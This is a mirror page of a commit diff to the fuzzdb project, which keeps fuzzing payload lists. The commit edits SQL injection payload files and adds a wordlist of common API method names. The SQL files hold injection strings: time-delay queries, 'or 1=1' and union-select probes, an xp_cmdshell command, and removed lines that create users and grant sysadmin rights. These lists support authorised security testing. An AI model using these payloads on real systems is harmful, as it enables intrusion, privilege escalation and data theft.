mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2025-02-16 16:28:23 +00:00
commit
aca3346b38
3 changed files with 105 additions and 18 deletions
|
@ -29,13 +29,3 @@ benchmark(10000000,MD5(1))#
|
||||||
1)) or benchmark(10000000,MD5(1))#
|
1)) or benchmark(10000000,MD5(1))#
|
||||||
")) or benchmark(10000000,MD5(1))#
|
")) or benchmark(10000000,MD5(1))#
|
||||||
')) or benchmark(10000000,MD5(1))#
|
')) or benchmark(10000000,MD5(1))#
|
||||||
pg_sleep(__TIME__)--
|
|
||||||
1 or pg_sleep(__TIME__)--
|
|
||||||
" or pg_sleep(__TIME__)--
|
|
||||||
' or pg_sleep(__TIME__)--
|
|
||||||
1) or pg_sleep(__TIME__)--
|
|
||||||
") or pg_sleep(__TIME__)--
|
|
||||||
') or pg_sleep(__TIME__)--
|
|
||||||
1)) or pg_sleep(__TIME__)--
|
|
||||||
")) or pg_sleep(__TIME__)--
|
|
||||||
')) or pg_sleep(__TIME__)--
|
|
||||||
|
|
|
@ -1,12 +1,8 @@
|
||||||
|
; --
|
||||||
|
'; --
|
||||||
|
'); --
|
||||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||||
'create user name identified by 'pass123' --
|
|
||||||
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
|
||||||
' ; drop table temp --
|
|
||||||
'exec sp_addlogin 'name' , 'password' --
|
|
||||||
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
|
||||||
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
|
||||||
' grant connect to name; grant resource to name; --
|
' grant connect to name; grant resource to name; --
|
||||||
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
|
||||||
' or 1=1 --
|
' or 1=1 --
|
||||||
' union (select @@version) --
|
' union (select @@version) --
|
||||||
' union (select NULL, (select @@version)) --
|
' union (select NULL, (select @@version)) --
|
||||||
|
|
101
discovery/common-methods/common-methods.txt
Normal file
101
discovery/common-methods/common-methods.txt
Normal file
|
@ -0,0 +1,101 @@
|
||||||
|
account
|
||||||
|
accounts
|
||||||
|
active
|
||||||
|
activity
|
||||||
|
apikey
|
||||||
|
balance
|
||||||
|
block
|
||||||
|
blocks
|
||||||
|
calendar
|
||||||
|
category
|
||||||
|
change
|
||||||
|
check
|
||||||
|
close
|
||||||
|
coins
|
||||||
|
company
|
||||||
|
create
|
||||||
|
crypto
|
||||||
|
current
|
||||||
|
deposits
|
||||||
|
domain
|
||||||
|
domain
|
||||||
|
event
|
||||||
|
events
|
||||||
|
export
|
||||||
|
favorite
|
||||||
|
feature
|
||||||
|
file
|
||||||
|
fills
|
||||||
|
forecast
|
||||||
|
funding
|
||||||
|
glass
|
||||||
|
global
|
||||||
|
heartbeat
|
||||||
|
history
|
||||||
|
holds
|
||||||
|
holiday
|
||||||
|
hosts
|
||||||
|
in
|
||||||
|
indicators
|
||||||
|
ingredient
|
||||||
|
ipv4
|
||||||
|
ipv6
|
||||||
|
latestblock
|
||||||
|
ledger
|
||||||
|
list
|
||||||
|
lookup
|
||||||
|
malware
|
||||||
|
matches
|
||||||
|
messages
|
||||||
|
multiaddress
|
||||||
|
nids
|
||||||
|
orders
|
||||||
|
out
|
||||||
|
payment
|
||||||
|
phishing
|
||||||
|
position
|
||||||
|
price
|
||||||
|
product
|
||||||
|
products
|
||||||
|
profile
|
||||||
|
profiles
|
||||||
|
pulses
|
||||||
|
query
|
||||||
|
rate
|
||||||
|
rawblock
|
||||||
|
recipe
|
||||||
|
related
|
||||||
|
repay
|
||||||
|
report
|
||||||
|
rescan
|
||||||
|
scan
|
||||||
|
scan
|
||||||
|
search
|
||||||
|
section
|
||||||
|
self
|
||||||
|
send
|
||||||
|
spam
|
||||||
|
status
|
||||||
|
style
|
||||||
|
subscribed
|
||||||
|
suggest
|
||||||
|
threats
|
||||||
|
ticker
|
||||||
|
time
|
||||||
|
today
|
||||||
|
tomorrow
|
||||||
|
transaction
|
||||||
|
try
|
||||||
|
tx
|
||||||
|
type
|
||||||
|
types
|
||||||
|
url
|
||||||
|
user
|
||||||
|
users
|
||||||
|
validate
|
||||||
|
verify
|
||||||
|
version
|
||||||
|
version
|
||||||
|
volume
|
||||||
|
withdrawals
|
||||||
|
yesterday
|
Loading…
Add table
Reference in a new issue